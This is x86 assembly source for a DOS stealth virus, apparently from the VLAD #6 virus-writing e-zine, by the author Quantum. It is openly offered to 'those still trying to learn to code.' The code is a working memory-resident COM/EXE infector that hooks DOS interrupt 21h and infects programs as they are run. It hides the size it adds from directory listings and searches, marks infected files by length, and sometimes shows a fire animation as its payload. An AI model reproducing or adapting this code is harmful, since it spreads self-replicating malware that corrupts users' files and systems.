;
; "The Fire In Which We Burn" by Quantum / VLAD
;
; I was told recently that here at VLAD we may have done one too many
; research viruses and as such we may have forgotten our roots. So,
; for the enjoyment of all who are still trying to learn to code or
; are just now entering the scene, we have a minor stealth com/exe
; infector.
;
; The payload is rather interesting. :)
;
db 0e9h
dw offset vstart-103h
vstart:
push es
db 0bdh
recalc dw 0
mov ax,1895h
int 21h
cmp ax,9595h
jz ret2host
mov ax,es
dec ax
mov ds,ax
xor di,di
cmp byte ptr [di],"Z"
jnz ret2host
sub word ptr [di+3],(vend-vstart)/16+1
sub word ptr [di+12h],(vend-vstart)/16+1
mov ax,[di+12h]
mov es,ax
push cs
pop ds
mov cx,(vend-vstart)/2+1
lea si,[bp+offset vstart]
xor di,di
rep movsw
push ds
mov ds,cx
mov si,84h
mov di,offset oldi21-offset vstart
movsw
movsw
mov word ptr [si-4],offset newi21-offset vstart
mov word ptr [si-2],es
pop ds
ret2host:
push cs
pop ds
push cs
pop es
in al,40h
cmp al,53
jnz nomessage
call dodafire
mov ah,9
lea dx,[bp+offset message1]
int 21h
nomessage:
pop ax
cmp byte ptr ds:[bp+offset comexe],1
jz exeret
lea si,[bp+offset buf]
mov di,0ffh
inc di
push di
movsw
movsb
ret
exeret:
add ax,10h
add ds:[bp+offset orgentrypoint+2],ax
jmp $+2
db 0eah
orgentrypoint dw 0,0
comexe db 0
newi21:
cmp ax,1895h
jnz notcheck
mov ah,al
iret
notcheck:
xchg ah,al
cmp al,4eh
jz searchstealth
cmp al,4fh
jz searchstealth
cmp al,11h
jz dirstealth
cmp al,12h
jz dirstealth
cmp al,4bh
jz executing
xchg ah,al
onwiththeint:
db 0eah
oldi21 dw 0,0
goi21:
pushf
call dword ptr cs:[offset oldi21-offset vstart]
ret
dirstealth:
xchg ah,al
call goi21
pushf
push ax
push bx
push cx
push es
mov ah,2fh
call goi21
cmp byte ptr es:[bx],0ffh
jnz notxfcb
add bx,7
notxfcb:
mov ax,es:[bx+1dh]
call doesitdiv
jnz nodirstealth
sub word ptr es:[bx+1dh],vend-vstart ; won't return file to original size
sbb word ptr es:[bx+1fh],0 ; but hey
nodirstealth:
pop es
pop cx
pop bx
pop ax
popf
retf 2
searchstealth:
xchg ah,al
call goi21
pushf
push ax
push bx
push cx
push es
mov ah,2fh
call goi21
mov ax,es:[bx+1ah]
call doesitdiv
jnz nostealth
sub word ptr es:[bx+1ah],vend-vstart ; this will not return the file to
sbb word ptr es:[bx+1ah+2],0 ; original size :(
nostealth:
pop es
pop cx
pop bx
pop ax
popf
retf 2
executing:
push ax
push bx
push cx
push dx
push si
push di
push ds
push es
mov ax,03d02h
call goi21
xchg bx,ax
push cs
push cs
pop ds
pop es
mov ah,3fh
mov cx,1ah
mov dx,offset buf-offset vstart
mov di,dx
call goi21
call seeke
push ax
call doesitdiv
pop ax
jz closedafile
mov dx,"ZM"
cmp word ptr [di],dx
jz infectexe
push ax
sub ax,3
mov [offset jmpback+1-offset vstart],ax
mov [offset recalc-offset vstart],ax
mov byte ptr [offset comexe-offset vstart],0
pop ax
call calccx
xor dx,dx
call writefile
call seeks
mov cx,3
mov dx,offset jmpback-offset vstart
call writefile
jmp closedafile
infectexe:
mov byte ptr [offset comexe-offset vstart],1
mov si,offset buf-offset vstart+14h
mov di,offset orgentrypoint - offset vstart
movsw
movsw
push ax
mov cx,16
div cx
sub ax,[offset buf-offset vstart+8]
mov [si-4],dx
mov [si-2],ax
sub dx,offset vstart
mov word ptr [offset recalc-offset vstart],dx
pop ax
call calccx
mov si,offset buf-offset vstart+2
xor dx,dx
add [si],cx
adc [si+2],dx
call writefile
call seeks
mov cx,1ah
mov dx,offset buf-offset vstart
call writefile
closedafile:
mov ah,3eh
call goi21
pop es
pop ds
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp onwiththeint
seeke:
mov ax,04202h
jmp seek
seeks:
mov ax,04200h
seek:
xor cx,cx
xor dx,dx
call goi21
ret
writefile:
mov ah,40h
call goi21
ret
calccx:
mov cx,vend-vstart
add ax,cx
push cx
mov cl,53
div cl
pop cx
mov al,53
sub al,ah
xor ah,ah
add cx,ax
ret
doesitdiv:
mov cl,53
div cl
or ah,ah
ret
message1 db "You know, they say time is the fire in which we burn",13,10,"$"
db "The Fire In Which We Burn by Quantum / VLAD"
dodafire:
; fire
mov ax,13h
int 10h
mov ax,0a000h
mov es,ax
mov dx,3c4h
mov ax,604h
out dx,ax
mov ax,0F02h
out dx,ax
mov dx,3D4h
mov ax,14h
out dx,ax
mov ax,0E317h
out dx,ax
mov al,9
out dx,al
inc dx
in al,dx
and al,0E0h
add al,7
out dx,al
mov dx,3c8h
xor ax,ax
out dx,al
inc dx
palloop1:
out dx,al
push ax
xor ax,ax
out dx,al
out dx,al
pop ax
inc ax
cmp al,64
jnz palloop1
xor ax,ax
palloop2:
push ax
mov al,63
out dx,al
pop ax
out dx,al
push ax
xor ax,ax
out dx,al
pop ax
inc ax
cmp al,64
jnz palloop2
xor ax,ax
palloop3:
push ax
mov al,63
out dx,al
out dx,al
pop ax
out dx,al
inc ax
cmp al,64
jnz palloop3
mov cx,255-192
palloop4:
mov al,63
out dx,al
out dx,al
out dx,al
loop palloop4
toploop:
push es
pop ds
push cs
pop es
mov di,offset vend
xor si,si
mov cx,80*(24+3)
rep movsw
mov cx,80
loop2:
in ax,40h
rloop:
dec ax
jnz rloop
in ax,40h
xor ax,cx
stosw
loop loop2
push ds
pop es
push cs
pop ds
xor dx,dx
mov si,offset vend+80
mov di,dx
mov cx,3
loop1:
mov ax,dx
mov al,[si-81]
add al,[si-80]
adc ah,dl
add al,[si-79]
adc ah,dl
add al,[si-1]
adc ah,dl
add al,[si+1]
adc ah,dl
add al,[si+79]
adc ah,dl
add al,[si+80]
adc ah,dl
add al,[si+81]
adc ah,dl
or ax,ax
jz noinc
dec ax
noinc:
shr ax,cl
stosb
inc si
cmp si,offset vend+80+80*(49+6)
jnz loop1
mov dx,3dah
wv1:
in al,dx
test al,8
jnz wv1
wv2:
in al,dx
test al,8
jz wv2
mov ah,1
int 16h
jz toploop
xor ax,ax
int 16h
mov ax,3
int 10h
int 20h
ret
jmpback db 0e9h,0,0
buf:
int 20h
db 90h
db 1ah dup (0)
vend:
- VLAD #6 INDEX -